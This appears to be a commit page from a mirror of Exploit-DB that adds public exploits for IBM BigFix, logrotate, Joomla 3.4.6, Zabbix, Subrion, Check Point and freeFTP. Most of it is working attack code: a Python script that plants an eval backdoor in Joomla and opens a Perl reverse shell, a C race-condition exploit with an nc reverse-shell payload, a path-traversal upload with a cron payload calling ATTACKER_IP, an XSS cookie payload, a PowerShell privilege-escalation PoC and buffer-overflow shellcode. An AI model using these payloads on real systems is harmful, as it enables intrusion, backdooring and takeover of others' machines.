bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-10-08

Browse source 
8 changes to exploits/shellcodes

logrotten 3.15.1 - Privilege Escalation
ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation

freeFTP 1.0.8 - Remote Buffer Overflow
Joomla 3.4.6 - 'configuration.php' Remote Code Execution
Zabbix 4.2 - Authentication Bypass
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
This commit is contained in:
Offensive Security 2019-10-08 05:01:48 +00:00
parent 0486c1c8ad
commit bfcf0daec9
9 changed files with 1052 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

180
exploits/java/webapps/47470.txt Normal file
View file

@ -0,0 +1,180 @@
# Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
# Date: 2018-12-11
# Exploit Authors: Jakub Palaczynski
# Vendor Homepage: https://www.ibm.com/
# Version: IBM Bigfix Platform <= 9.5.9.62
# CVE: CVE-2019-4013
Description:
============
Any authenticated (even unprivileged) user can upload any file to any location on the server with root privileges. This results in code execution on underlying system with root privileges.
What caused this issue:
* path traversal - it is possible to escape from original directory and upload file to any other location
* server running with root privileges - user can upload file to ANY location on the system
* upload any type of file - application does not verify extension and MIME type of uploaded files
* authorization bypass (reported as separate issue) - any user can reveal privileged functionality and access it without proper rights set
* possibility to win the race - application uploads file to location specified in "urlFileName" parameter (path traversal), however it then moves it to another. An attacker needs to win race and execute script before it is moved.
Issue was found in "Apps > Software > Add Software" menu. Here user needs to choose upload via URL option as only this one is vulnerable.
URL needs to point to attacker's web server where he hosts for example script files.
When form is submitted we can see on proxy "urlFileName" parameter. This one is vulnerable to path traversal. This parameter specifies temporary file name that will be used on the system. Then application moves this file to another location that is not controlled by application user.
An attacker can for example upload script file on the web server and execute it by sending GET request. However as a PoC we will use cron. Here we upload 2 files - cron file and script file that will be executed by cron.
Uploading cron task and script file is the same as below but of course with different content downloaded from the web server. Those two HTTP requests should be sent in loop to finally win a race and execute our script.
Proof of Concept:
=================
cron.txt served on attacker's web server:
* * * * * root bash /tmp/icmp.sh
icmp.txt served on attacker's web server:
#!/bin/bash
ping -c 3 ATTACKER_IP
Uploading cron task:
POST /swd/api/packages/upload HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Length: 846
Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
X-XSRF-TOKEN: XXX
Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
Connection: close
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="fileURL"
http://ATTACKER_IP/cron.txt
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="username"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="password"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlFileName"
../../../../../../../../etc/cron.d/task
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlDownloadAtRuntime"
false
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="uploadId"
user_1543410578364620
-----------------------------7289782871626994727576601809--
Uploading script file:
POST /swd/api/packages/upload HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Length: 846
Content-Type: multipart/form-data; boundary=---------------------------7289782871626994727576601809
X-XSRF-TOKEN: XXX
Cookie: _csrf=XXX; XSRF-TOKEN=XXX; user_session=XXX
Connection: close
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="fileURL"
http://ATTACKER_IP/icmp.txt
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="username"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="password"
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlFileName"
../../../../../../../../tmp/icmp.sh
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="urlDownloadAtRuntime"
false
-----------------------------7289782871626994727576601809
Content-Disposition: form-data; name="uploadId"
user_1543410578364620
-----------------------------7289782871626994727576601809--
After a while our script should be executed with root privileges.

354
exploits/linux/local/47466.c Normal file
View file

@ -0,0 +1,354 @@
# Exploit Title: logrotten 3.15.1 - Privilege Escalation
# Date: 2019-10-04
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://github.com/logrotate/logrotate
# Software Link: https://github.com/logrotate/logrotate/releases/tag/3.15.1
# Version: all versions through 3.15.1
# Tested on: Debian GNU/Linux 9.5 (stretch)
## Brief description
- logrotate is prone to a race condition after renaming the logfile.
- If logrotate is executed as root, with option that creates a
file ( like create, copy, compress, etc.) and the user is in control
of the logfile path, it is possible to abuse a race-condition to write
files in ANY directories.
- An attacker could elevate his privileges by writing reverse-shells into
directories like "/etc/bash_completition.d/".
## Precondition for privilege escalation
- Logrotate has to be executed as root
- The logpath needs to be in control of the attacker
- Any option that creates files is set in the logrotate configuration
## Tested version
- Debian GNU/Linux 9.5 (stretch)
- Amazon Linux 2 AMI (HVM)
- Ubuntu 18.04.1
- logrotate 3.8.6
- logrotate 3.11.0
- logrotate 3.15.0
## Compile
- gcc -o logrotten logrotten.c
## Prepare payload
```
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &);
fi" > payloadfile
```
## Run exploit
If "create"-option is set in logrotate.cfg:
```
./logrotten -p ./payloadfile /tmp/log/pwnme.log
```
If "compress"-option is set in logrotate.cfg:
```
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```
## Known Problems
- It's hard to win the race inside a docker container or on a lvm2-volume
## Mitigation
- make sure that logpath is owned by root
- use option "su" in logrotate.cfg
- use selinux or apparmor
## Author
- Wolfgang Hotwagner
## References
- https://github.com/whotwagner/logrotten
-
https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
-
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
- https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
-
https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
logrotten.c
/*
* logrotate poc exploit
*
* [ Brief description ]
* - logrotate is prone to a race condition after renaming the logfile.
* - If logrotate is executed as root and the user is in control of the logfile path, it is possible to abuse a race-condition to write files in ANY directories.
* - An attacker could elevate his privileges by writing reverse-shells into
* directories like "/etc/bash_completition.d/".
*
* [ Precondition for privilege escalation ]
* - Logrotate needs to be executed as root
* - The logpath needs to be in control of the attacker
* - Any option(create,compress,copy,etc..) that creates a new file is set in the logrotate configuration.
*
* [ Tested version ]
* - Debian GNU/Linux 9.5 (stretch)
* - Amazon Linux 2 AMI (HVM)
* - Ubuntu 18.04.1
* - logrotate 3.8.6
* - logrotate 3.11.0
* - logrotate 3.15.0
*
* [ Compile ]
* - gcc -o logrotten logrotten.c
*
* [ Prepare payload ]
* - echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
*
* [ Run exploit ]
* - nice -n -20 ./logrotten -p payloadfile /tmp/log/pwnme.log
* - if compress is used: nice -n -20 ./logrotten -c -s 3 -p payloadfile /tmp/log/pwnme.log.1
*
* [ Known Problems ]
* - It's hard to win the race inside a docker container or on a lvm2-volume
*
* [ Mitigation ]
* - make sure that logpath is owned by root
* - use su-option in logrotate.cfg
* - use selinux or apparmor
*
* [ Author ]
* - Wolfgang Hotwagner
*
* [ Contact ]
* - https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
* - https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
* - https://github.com/whotwagner/logrotten
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#include <sys/stat.h>
#include <getopt.h>
#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
/* use TARGETDIR without "/" at the end */
#define TARGETDIR "/etc/bash_completion.d"
#define PROGNAME "logrotten"
void usage(const char* progname)
{
printf("usage: %s [OPTION...] <logfile>\n",progname);
printf(" %-3s %-22s %-30s\n","-h","--help","Print this help");
printf(" %-3s %-22s %-30s\n","-t","--targetdir <dir>","Abosulte path to the target directory");
printf(" %-3s %-22s %-30s\n","-p","--payloadfile <file>","File that contains the payload");
printf(" %-3s %-22s %-30s\n","-s","--sleep <sec>","Wait before writing the payload");
printf(" %-3s %-22s %-30s\n","-d","--debug","Print verbose debug messages");
printf(" %-3s %-22s %-30s\n","-c","--compress","Hijack compressed files instead of created logfiles");
printf(" %-3s %-22s %-30s\n","-o","--open","Use IN_OPEN instead of IN_MOVED_FROM");
}
int main(int argc, char* argv[] )
{
int length, i = 0;
int j = 0;
int index = 0;
int fd;
int wd;
char buffer[EVENT_BUF_LEN];
uint32_t imask = IN_MOVED_FROM;
char *payloadfile = NULL;
char *logfile = NULL;
char *targetdir = NULL;
char *logpath;
char *logpath2;
char *targetpath;
int debug = 0;
int sleeptime = 1;
char ch;
const char *p;
FILE *source, *target;
int c;
while(1)
{
int this_option_optind = optind ? optind : 1;
int option_index = 0;
static struct option long_options[] = {
{"payloadfile", required_argument, 0, 0},
{"targetdir", required_argument, 0, 0},
{"sleep", required_argument, 0, 0},
{"help", no_argument, 0, 0},
{"open", no_argument, 0, 0},
{"debug", no_argument, 0, 0},
{"compress", no_argument, 0, 0},
{0,0,0,0}
};
c = getopt_long(argc,argv,"hocdp:t:s:", long_options, &option_index);
if (c == -1)
break;
switch(c)
{
case 'p':
payloadfile = alloca((strlen(optarg)+1)*sizeof(char));
memset(payloadfile,'\0',strlen(optarg)+1);
strncpy(payloadfile,optarg,strlen(optarg));
break;
case 't':
targetdir = alloca((strlen(optarg)+1)*sizeof(char));
memset(targetdir,'\0',strlen(optarg)+1);
strncpy(targetdir,optarg,strlen(optarg));
break;
case 'h':
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
case 'd':
debug = 1;
break;
case 'o':
imask = IN_OPEN;
break;
case 'c':
imask = IN_OPEN;
break;
case 's':
sleeptime = atoi(optarg);
break;
default:
usage(PROGNAME);
exit(EXIT_FAILURE);
break;
}
}
if(argc == (optind+1))
{
logfile = alloca((strlen(argv[optind])+1)*sizeof(char));
memset(logfile,'\0',strlen(argv[optind])+1);
strncpy(logfile,argv[optind],strlen(argv[optind]));
}
else
{
usage(PROGNAME);
exit(EXIT_FAILURE);
}
for(j=strlen(logfile); (logfile[j] != '/') && (j != 0); j--);
index = j+1;
p = &logfile[index];
logpath = alloca(strlen(logfile)*sizeof(char));
logpath2 = alloca((strlen(logfile)+2)*sizeof(char));
if(targetdir != NULL)
{
targetpath = alloca( ( (strlen(targetdir)) + (strlen(p)) +3) *sizeof(char));
strcat(targetpath,targetdir);
}
else
{
targetdir= TARGETDIR;
targetpath = alloca( ( (strlen(TARGETDIR)) + (strlen(p)) +3) *sizeof(char));
targetpath[0] = '\0';
strcat(targetpath,TARGETDIR);
}
strcat(targetpath,"/");
strcat(targetpath,p);
for(j = 0; j < index; j++)
logpath[j] = logfile[j];
logpath[j-1] = '\0';
strcpy(logpath2,logpath);
logpath2[strlen(logpath)] = '2';
logpath2[strlen(logpath)+1] = '\0';
/*creating the INOTIFY instance*/
fd = inotify_init();
if( debug == 1)
{
printf("logfile: %s\n",logfile);
printf("logpath: %s\n",logpath);
printf("logpath2: %s\n",logpath2);
printf("targetpath: %s\n",targetpath);
printf("targetdir: %s\n",targetdir);
printf("p: %s\n",p);
}
/*checking for error*/
if ( fd < 0 ) {
perror( "inotify_init" );
}
wd = inotify_add_watch( fd,logpath, imask );
printf("Waiting for rotating %s...\n",logfile);
while(1)
{
i=0;
length = read( fd, buffer, EVENT_BUF_LEN );
while (i < length) {
struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ]; if ( event->len ) {
if ( event->mask & imask ) {
if(strcmp(event->name,p) == 0)
{
rename(logpath,logpath2);
symlink(targetdir,logpath);
printf("Renamed %s with %s and created symlink to %s\n",logpath,logpath2,targetdir);
if(payloadfile != NULL)
{
printf("Waiting %d seconds before writing payload...\n",sleeptime);
sleep(sleeptime);
source = fopen(payloadfile, "r");
if(source == NULL)
exit(EXIT_FAILURE);
target = fopen(targetpath, "w");
if(target == NULL)
{
fclose(source);
exit(EXIT_FAILURE);
}
while ((ch = fgetc(source)) != EOF)
fputc(ch, target);
chmod(targetpath,S_IRUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH);
fclose(source);
fclose(target);
}
inotify_rm_watch( fd, wd );
close( fd );
printf("Done!\n");
exit(EXIT_SUCCESS);
}
}
}
i += EVENT_SIZE + event->len;
}
}
/*removing from the watch list.*/
inotify_rm_watch( fd, wd );
/*closing the INOTIFY instance*/
close( fd );
exit(EXIT_SUCCESS);
}

182
exploits/php/webapps/47465.py Executable file
View file

@ -0,0 +1,182 @@
# Exploit Title: Joomla 3.4.6 - 'configuration.php' Remote Code Execution
# Google Dork: N/A
# Date: 2019-10-02
# Exploit Author: Alessandro Groppo @Hacktive Security
# Vendor Homepage: https//www.joomla.it/
# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
# Version: 3.0.0 --> 3.4.6
# Tested on: Linux
# CVE : N/A
#
# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
# Github: https://github.com/kiks7/rusty_joomla_rce
#
# The exploitation is implanting a backdoor in /configuration.php file in the root directory
# with an eval in order to be more suitable for all environments, but it is also more intrusive.
# If you don't like this way, you can replace the get_backdoor_pay()
# with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
def random_string(stringLength):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
backdoor_param = random_string(50)
def print_info(str):
print(colored("[*] " + str,"cyan"))
def print_ok(str):
print(colored("[+] "+ str,"green"))
def print_error(str):
print(colored("[-] "+ str,"red"))
def print_warning(str):
print(colored("[!!] " + str,"yellow"))
def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf
def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True
def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies
def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload = command + ' || $a=\'http://wtf\';'
payload = 'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)
user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
csrf :'1'
}
print_info('Sending request ..')
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text
def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload = command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False
def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False
def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)
def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')
# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())
url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')
else:
print_error('Seems NOT Vulnerable ;/')

63
exploits/php/webapps/47467.txt Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: Zabbix 4.2 - Authentication Bypass
# Date: 2019-10-06
# Exploit Author: Milad Khoshdel
# Software Link: https://www.zabbix.com/download
# Version: Zabbix [2.x , 3.x , 4.x] Tested on latest version Zabbix 4.2
# Tested on: Linux Apache/2 PHP/7.2
# Google Dork: inurl:zabbix/zabbix.php
=========
Vulnerable Page:
=========
/zabbix.php?action=dashboard.view&dashboardid=1
=========
POC:
=========
Attacker can bypass login page and access to dashboard page and create [Dashboard/Report/Screen/Map] without any Username/Password and anonymously.
All Created elements [Dashboard/Report/Screen/Map] is accessible by other users and admin.
REGUEST -->
GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1
Host: [HOST-IP]
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
RESPONSE -->
HTTP/1.1 200 OK
Date: Sun, 06 Oct 2019 11:40:18 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: zbx_sessionid=a8d192ec833bd4476e0f6a550e6e5bed; HttpOnly
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=i2j8kt08m7dp3ojstqeaod9joo; path=/; HttpOnly
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 19239
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
[Dashboard Page Content Will Load Here]
</html>

17
exploits/php/webapps/47469.txt Normal file
View file

@ -0,0 +1,17 @@
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description : Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.
First login the panel with user credential, Go to member tag from left menu.
http://localhost/panel/members/
Username, Full Name, Email are editable with double click on it. Insert the
following payload
<img src=x onerror=alert(document.cookie)>

71
exploits/windows/local/47471.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation
# Date: 2019-01-30
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: https://www.checkpoint.com/
# Version: Check Point Endpoint Security VPN <= E80.87 Build 986009514
# Version: Check Point ZoneAlarm <= 15.4.062.17802
# CVE: CVE-2019-8452
Description:
============
It is possible to change permissions of arbitrary file so that user have full control over it after exploitation which results in Local Privilege Escalation.
It was found that Check Point software (Endpoint Security Client and ZoneAlarm) uses tvDebug.log file stored in "C:\Windows\Internet Logs\tvDebug.log" or in ProgramData, for example "C:\ProgramData\CheckPoint\ZoneAlarm\Logs\tvDebug.log".
Over this log file all authenticated users have full control and it was found that Check Point service writes to it with SYSTEM privileges.
However this file could not be used for exploitaion as it is always used/taken by Check Point service so for example this is why users cannot delete it in normal conditions (unless service crashes and/or is restarted).
However it was noticed that when this log file reaches some limit (depending on software) then it is archived to the same location and name but with ZIP extension. The same permissions are set for this archive file so all authenticated users can access it.
Taking all of this into account we can create an attack scenario:
1. If tvDebug.zip file exists then delete it
2. Create hardlink (using CreateHardlink.exe) named tvDebug.zip which points to other file that we would like to have permissions to (this file must not be taken by other process when Check Point service tries to use it)
3. Fill tvDebug.log log file above the limit. For ZoneAlarm it is 50Mb, for VPN it is 20Mb. It can be done by using software as normal user.
4. Restart system as service needs to be restarted to make an archive.
5. Now your file has permissions changed and you have all access to it.
6. If we pointed to "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll" in step 2 then we can replace this DLL with custom one.
7. Click "VPN Options" in Client GUI and then close this windows. Closing "VPN Options" window forces LogonISReg.dll to be loaded with SYSTEM privileges.
Proof of Concept:
=================
# PoC written in PowerShell to fully exploit Check Point Endpoint Client. It can be used also to exploit ZoneAlarm.
# file that we want to have permissions to
# LogonISReg.dll is not used on startup and we can force to load it with SYSTEM privileges after exploitation
$file = "C:\Program Files (x86)\CheckPoint\Endpoint Connect\LogonISReg.dll"
# path to symboliclink testing tools CreateHardlink.exe
# CreateHardlink.exe is a tool created by James Forshaw - https://github.com/googleprojectzero/symboliclink-testing-tools
$hardlink = "C:\Temp\CreateHardlink.exe"
Write-Host "[!] Detecting Check Point software."
if ([System.IO.File]::Exists("$env:windir\Internet Logs\tvDebug.log")) {
$logfile = "$env:windir\Internet Logs\tvDebug.zip"
Write-Host "[+] Check Point Endpoint Security found."
}
elseif ([System.IO.File]::Exists("$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.log")) {
$logfile = "$env:programdata\CheckPoint\ZoneAlarm\Logs\tvDebug.zip"
Write-Host "[+] Check Point ZoneAlarm found."
}
else {
Write-Host "[-] Check Point software was not found."
}
Write-Host "[!] Trying to delete tvDebug.zip file."
if ([System.IO.File]::Exists($logfile)) {
while ([System.IO.File]::Exists($logfile)) { Remove-Item -Force 朴ath $logfile -ErrorAction SilentlyContinue }
Write-Host "[+] Successfully deleted tvDebug.zip archive file."
}
else {
Write-Host "[+] tvDebug.zip archive file was not found."
}
Write-Host "[!] Creating hardlink to a file that we would like to change permissions."
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $hardlink `"$logfile`" `"$file`""
while (!([System.IO.File]::Exists($logfile))) { Sleep 1 }
Write-Host "[+] Hardlink successfully created."
Write-Host "[!] 1. Fill log file up to the limit and restart computer."
Write-Host "[!] 2. Now when permissions are changed replace LogonISReg.dll with your custom DLL."
Write-Host "[!] 3. Click VPN Options in Client GUI and close this window to force DLL load."

63
exploits/windows/remote/47472.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
from ftplib import FTP
buf = ""
buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
